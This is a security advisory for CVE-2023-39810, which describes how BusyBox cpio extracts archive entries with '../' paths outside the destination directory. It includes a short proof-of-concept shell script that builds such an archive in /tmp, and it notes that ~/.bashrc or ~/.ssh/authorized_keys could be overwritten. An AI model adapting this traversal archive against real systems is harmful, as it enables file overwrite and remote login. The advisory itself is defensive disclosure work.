CVE-2023-39810: Busybox cpio directory traversal vulnerability (CVE-2023-39810)

When extracting cpio archives with BusyBox cpio, the cpio archiving tools may write files outside the destination directory and there is no option to prevent this.

Summary

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L, 6.1 Medium

cpio is an archive format and also an archive handling tool. Several implementations exist, for example GNU cpio, bsdcpio, and BusyBox cpio. The BusyBox variant of cpio has been found to extract archives that contain relative file names starting with …/ and this cannot be prevented.

While bsdcpio ignores archived files that have absolut file names or start with …/ and GNU cpio has a parameter to prevent extracting these file names, BusyBox processes archives with such names and there is no parameter to handle potentially untrusted archives.

Impact

If untrusted archives are extracted, this may result in writing files outside the destination directory. This could result in files being overwritten that contain configuration in form of shell scripts such as ~/.bashrc or that enable a login from a remote side such as the ~/.ssh/authorized_keys file.

Timeline

• 2023-07-24: Vulnerability noticed.

• 2023-07-26: Initial contact of BusyBox maintainer via e-mail.

• 2023-08-01: Second try to contact BusyBox maintainer via e-mail. First try to contact developer of the module, but e-mail bounced. First contact to Debian security team, because BusyBox package is available via Debian packages.

• 2023-08-24: CVE-2023-39810 was assigned.

• 2023-08-28: Advisory published after not being able to get in contact with maintainer or developer.

Affected Components

The issue affects BusyBox cpio in multiple versions on different platforms. Pentagrid tested the following versions and could successfully reproduce the issue.

• BusyBox v1.33.2

• BusyBox v1.30.1

Technical Details

The processing of relative and absolute file names could result in risks. For example the GNU cpio program was affected by the same vulnerability, referenced as “CVE-2005-1229 - Directory traversal vulnerability in cpio 2.6 and earlier allows remote attackers to write to arbitrary directories via a … (dot dot) in a cpio file.” A patch was developed and added to cpio 2.6-6, which requires an additional parameter --no-absolute-filenames to prevent files being overwritten. This option also works for relative file names. This is still an insecure default, but an improvement.

BusyBox cpio is another implementation, but it has no similar mechanism to avoid the processing of relative files as shown with the proof of concept below:

#!/bin/sh set -e echo + Clean-up rm -rf /tmp/testcase echo + Create a test archive mkdir -p /tmp/testcase/a/b/ echo test > /tmp/testcase/testfile cd /tmp/testcase/a/b/ (echo …/…/testfile; echo /etc/hostname) | cpio -ov -H newc -O /tmp/testcase/a/b/archive.cpio --quiet rm /tmp/testcase/testfile echo + Extract archive mkdir /tmp/testcase/a/b/etc strace -f busybox cpio -iv < archive.cpio 2>&1 | grep ‘hostname\|testfile’ | grep -v read echo + List files find /tmp/testcase/

The final find command lists extracted files:

/tmp/testcase/ /tmp/testcase/testfile <-- extracted rel. file /tmp/testcase/a /tmp/testcase/a/b <-- working directory /tmp/testcase/a/b/etc /tmp/testcase/a/b/etc/hostname <-- extracted abs. file /tmp/testcase/a/b/archive.cpio <-- archive to extract

According to the output above, the testfile is written outside of the working directory.

Precondition

An untrusted archive is extracted with the BusyBox cpio tool and the running cpio process has permissions to write files outside the destination directory.

Recommendation

Pentagrid recommends changing the default behaviour and to ignore relative file names within a cpio archive. To process files with relative file names, a command line flag could be introduced like it was done for GNU cpio.

Users can specify on the BusyBox cpio command line which file name should be unpacked, which should be safe as long as no directory traversal is included in that file name argument.

Credits

The vulnerability has been found by Tobias Ospelt and Martin Schobert of Pentagrid.